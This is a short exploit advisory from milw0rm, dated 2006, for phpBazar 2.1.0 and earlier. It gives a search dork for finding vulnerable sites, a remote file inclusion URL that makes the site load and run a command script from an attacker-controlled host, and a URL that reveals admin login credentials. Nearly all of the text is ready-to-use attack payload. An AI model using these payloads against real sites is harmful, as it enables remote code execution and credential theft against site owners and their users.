9 lines
No EOL
326 B
Text
9 lines
No EOL
326 B
Text
Title: phpBazar <= 2.1.0 Multiple vulnerabilites
|
|
URL: http://www.smartisoft.com/
|
|
Dork: inurl:classified.php phpbazar
|
|
|
|
Exploits:
|
|
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
|
|
-access to admin login and password: /admin/admin.php?action=edit_member&value=1
|
|
|
|
# milw0rm.com [2006-05-19] |